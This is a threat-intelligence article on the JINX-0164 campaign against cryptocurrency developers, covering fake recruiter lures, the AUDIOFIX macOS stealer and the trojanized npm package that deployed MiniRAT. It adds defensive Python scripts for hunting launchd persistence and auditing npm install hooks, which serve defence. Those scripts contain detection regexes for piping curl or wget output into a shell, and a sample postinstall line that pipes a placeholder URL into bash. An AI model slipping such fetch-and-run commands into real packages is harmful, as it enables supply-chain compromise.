JINX-0164 Threat Actor

A previously undocumented threat actor identified as JINX-0164 has orchestrated a highly targeted cyber campaign against cryptocurrency organizations, using recruitment-themed social engineering and custom-built macOS malware to steal digital assets. Active since at least mid-2025, the financially motivated group has focused heavily on developers and, in at least one confirmed incident, executed a software supply chain compromise.

The campaign combines recruitment-themed social engineering, custom malware and follow-on access to CI/CD environments. From compromised employee workstations the attackers moved into development infrastructure and code distribution systems, which is what turned individual endpoint infections into a supply chain compromise with far wider reach.

Recruitment Scams Become the Entry Point

JINX-0164 relies on convincing LinkedIn personas to initiate contact with targeted developers and employees working within cryptocurrency-related organizations. Victims are invited to participate in virtual meetings hosted on fraudulent domains impersonating legitimate teleconferencing platforms.

During the fake meeting setup process, targets are instructed to download what appears to be a meeting client or technical fix. In reality, the downloaded file initiates the infection chain by retrieving a Python-based macOS infostealer and remote access trojan known as AUDIOFIX from a spoofed driver distribution domain, 'apple.driver-store.com.'

The infection is staged by a bash script that identifies the victim's CPU architecture so the matching build runs on both Intel and Apple Silicon Macs. The payload masquerades as 'coreaudiod' (the name of the legitimate macOS Core Audio daemon, which normally runs from /usr/sbin), is written to disk as 'ChromeUpdater', and is registered as a launchd job via launchctl so that it is restarted at login or boot.
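The two names above give a defender something concrete to hunt for. The following script is an added example (not code from the article or from the researchers who analysed AUDIOFIX) that parses launchd job definitions in the user and system LaunchAgents/LaunchDaemons directories and flags jobs that borrow the coreaudiod name while running from somewhere other than Apple's /usr/sbin/coreaudiod, or whose command line references a file called ChromeUpdater. The plist field layout of the malicious job, the label it uses and the sample paths are assumptions; the article only reports the two names.

```python
"""Hunt launchd plists for the persistence names reported for AUDIOFIX.

Added example. The shape of the attacker's plist (label, paths, RunAtLoad)
is assumed for illustration; only the names 'coreaudiod' and
'ChromeUpdater' come from the published analysis.
"""
import os
import plistlib
from pathlib import Path

LEGIT_COREAUDIOD = "/usr/sbin/coreaudiod"          # Apple's real daemon
INTERPRETERS = {"python", "python3", "bash", "sh", "zsh", "osascript"}


def default_launchd_dirs():
    """Directories launchd scans for third-party job definitions."""
    dirs = [Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
    try:
        dirs.insert(0, Path.home() / "Library/LaunchAgents")
    except RuntimeError:  # no resolvable home directory
        pass
    return dirs


def assess_job(job: dict) -> list:
    """Return a list of reasons a parsed launchd job resembles the reported persistence."""
    reasons = []
    label = str(job.get("Label", ""))
    args = [str(a) for a in (job.get("ProgramArguments") or [])]
    if job.get("Program"):
        args = [str(job["Program"])] + args
    if not args:
        return reasons
    exe = args[0]
    base = os.path.basename(exe)

    # 1. Something calling itself coreaudiod that is not Apple's daemon.
    if base.lower() == "coreaudiod" and exe != LEGIT_COREAUDIOD:
        reasons.append(f"coreaudiod executed from non-standard path {exe!r}")
    # 2. A label borrowing the daemon's name while launching something else.
    if "coreaudiod" in label.lower() and exe != LEGIT_COREAUDIOD:
        reasons.append(f"label {label!r} borrows the coreaudiod name for {exe!r}")
    # 3. The reported on-disk name anywhere in the command line.
    hits = [a for a in args if "chromeupdater" in os.path.basename(a).lower()]
    if hits:
        reasons.append(f"command line references reported on-disk name: {hits}")
    # 4. The stealer is Python-based, so an interpreter wrapping a flagged payload is notable.
    if base in INTERPRETERS and len(args) > 1 and reasons:
        reasons.append(f"payload launched via interpreter {base!r}")
    if reasons and job.get("RunAtLoad"):
        reasons.append("RunAtLoad set: job starts at login/boot")
    return reasons


def assess_plist_bytes(data: bytes) -> list:
    """Parse a plist (XML or binary) and assess it; unparseable files are reported too."""
    try:
        job = plistlib.loads(data)
    except Exception as exc:
        return [f"unparseable plist: {exc}"]
    return assess_job(job) if isinstance(job, dict) else ["plist root is not a dict"]


def scan_launchd_dirs(dirs=None) -> dict:
    """Map plist path -> reasons for every flagged job under the given directories."""
    findings = {}
    for d in dirs if dirs is not None else default_launchd_dirs():
        if not d.is_dir():
            continue
        for p in d.glob("*.plist"):
            reasons = assess_plist_bytes(p.read_bytes())
            if reasons:
                findings[str(p)] = reasons
    return findings


# Constructed sample of what the dropper's job might look like (assumed, not captured).
SAMPLE_MALICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.coreaudiod</string>
<key>ProgramArguments</key><array>
<string>/Users/dev/Library/Application Support/ChromeUpdater</string>
</array>
<key>RunAtLoad</key><true/>
</dict></plist>
"""

# Constructed benign job for comparison.
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
</dict></plist>
"""

if __name__ == "__main__":
    print("sample malicious:", assess_plist_bytes(SAMPLE_MALICIOUS))
    print("sample benign:", assess_plist_bytes(SAMPLE_BENIGN))
    for path, why in scan_launchd_dirs().items():
        print(path, why)
```

Run it as the user whose workstation is in question; the per-user LaunchAgents directory is where a non-root dropper can write. Apple's own coreaudiod job lives under /System/Library/LaunchDaemons and is deliberately not scanned, so a hit here is never the genuine daemon. Treat the check as a starting point: once an attacker has the credentials AUDIOFIX steals, persistence can just as well be re-established under a different name, so pair this with a review of recently modified plists and unsigned binaries in the same directories.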

AUDIOFIX Enables Deep System Compromise

Once deployed, AUDIOFIX performs extensive credential theft and reconnaissance operations while also supporting lateral movement into internal infrastructure. Researchers observed the malware being used to inject malicious payloads into development systems and modify source code in attempts to compromise additional endpoints and harvest cryptocurrency wallet credentials.

The malware is capable of stealing a broad range of sensitive information, including:

  • Password manager credentials, browser data, iCloud Keychain files, SSH keys, administrator credentials, console history records, and configuration files
  • Cryptocurrency wallet addresses, browser extension data linked to crypto services, and active sessions from Discord, Slack, and Telegram

Beyond information theft, AUDIOFIX also supports remote command execution, file deletion, payload delivery, reconnaissance activities, and data exfiltration from infected systems.

MiniRAT Expands the Threat Through Supply Chain Abuse

Another major component of the operation is MiniRAT, a Go-based backdoor tied to a compromised npm package named '@velora-dex/sdk.' The package was associated with a legitimate decentralized finance toolkit used for token swaps, delta trading, and limit orders on the VeloraDEX platform.

The malicious version of the package retrieved a shell script from a remote server, ultimately deploying a macOS-specific MiniRAT binary. Once installed, the malware enabled attackers to upload files, execute arbitrary shell commands, and download additional payloads from attacker-controlled infrastructure.
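A package that fetches and runs a remote shell script is exactly the behaviour a dependency audit should surface before install scripts execute. The script below is an added example, not code from the article or from the VeloraDEX project, that walks a node_modules tree, reads each package's package.json and reports install-time lifecycle hooks, rating as high severity any hook whose command pipes curl or wget output into a shell or decodes base64 before running it. The article does not say which hook (if any) the trojanized @velora-dex/sdk release used, so the focus on lifecycle scripts is an assumption about the most common mechanism, and the sample manifests are constructed with placeholder names and an example.invalid URL.

```python
"""Audit npm packages for install-time scripts that fetch and execute remote content.

Added example. Package names, versions and the URL in the samples are
constructed; they do not reproduce the contents of any real release.
"""
import json
import re
from pathlib import Path

# Hooks npm runs automatically during `npm install` / `npm ci`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Fetch-and-run shapes worth treating as high severity (assumed heuristics).
FETCH_PATTERNS = [
    # curl/wget output piped straight into a shell, e.g. "curl -fsSL URL | bash"
    re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # download to a file, then execute it: "curl -o x URL && sh x"
    re.compile(r"\b(curl|wget)\b.*https?://\S+.*&&\s*(sudo\s+)?(ba|z)?sh\b"),
    # inline node fetching and evaluating remote code
    re.compile(r"node\s+-e\b.*\b(https?\.get|fetch)\s*\("),
    # base64-decoded payload executed at install time
    re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
]


def audit_scripts(manifest: dict) -> list:
    """Return one finding per lifecycle hook present in a package.json dict."""
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        matched = any(p.search(cmd) for p in FETCH_PATTERNS)
        findings.append({
            "package": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "hook": hook,
            "command": cmd,
            # Any install hook deserves a look; a fetch-and-run shape is high severity.
            "severity": "high" if matched else "review",
        })
    return findings


def audit_node_modules(root: Path) -> list:
    """Audit every installed package (scoped and unscoped) beneath root."""
    findings = []
    patterns = ("**/node_modules/*/package.json", "**/node_modules/@*/*/package.json")
    for pattern in patterns:
        for pkg_json in sorted(root.glob(pattern)):
            try:
                manifest = json.loads(pkg_json.read_text(encoding="utf-8"))
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest: skip, not a finding
            findings.extend(audit_scripts(manifest))
    return findings


# Constructed manifests for demonstration.
SAMPLE_TROJANIZED = {
    "name": "some-dex-sdk",
    "version": "0.0.0-example",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "curl -fsSL https://example.invalid/setup.sh | bash",
    },
}
SAMPLE_NO_HOOKS = {"name": "tiny-util", "version": "1.0.0", "scripts": {"test": "node test.js"}}
SAMPLE_NATIVE = {"name": "native-addon", "version": "2.1.0", "scripts": {"install": "node-gyp rebuild"}}

if __name__ == "__main__":
    for sample in (SAMPLE_TROJANIZED, SAMPLE_NO_HOOKS, SAMPLE_NATIVE):
        print(json.dumps(audit_scripts(sample), indent=2))
    for f in audit_node_modules(Path(".")):
        print(f["severity"], f["package"], f["version"], f["hook"], "=>", f["command"])
```

Two caveats matter in practice. First, run the audit before scripts execute: `npm ci --ignore-scripts` installs the tree without running hooks, after which the manifests can be inspected and trusted packages rebuilt explicitly. Second, a package can also fetch its second stage at require() time rather than at install, which this check does not see; a committed lockfile, review of dependency version bumps in pull requests, and egress controls on build hosts are the complementary defences for that path.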

JINX-0164 has repeatedly reused social engineering tactics involving fake recruitment opportunities and fabricated technical problems requiring victims to install fraudulent software fixes. This consistent methodology highlights the group’s strong emphasis on human manipulation as a primary intrusion vector.

Possible Links to North Korean Cyber Operations

Several characteristics of the campaign resemble activity previously associated with North Korean operators, including BlueNoroff, the Contagious Interview campaign and UNC1069. Researchers noted similarities in targeting patterns, spoofed domains, and the use of VPN services such as Astrill VPN.

Despite these overlaps, investigators have not identified any confirmed infrastructure connections linking JINX-0164 directly to North Korean state-sponsored operations. Current evidence suggests operational similarities rather than definitive attribution.
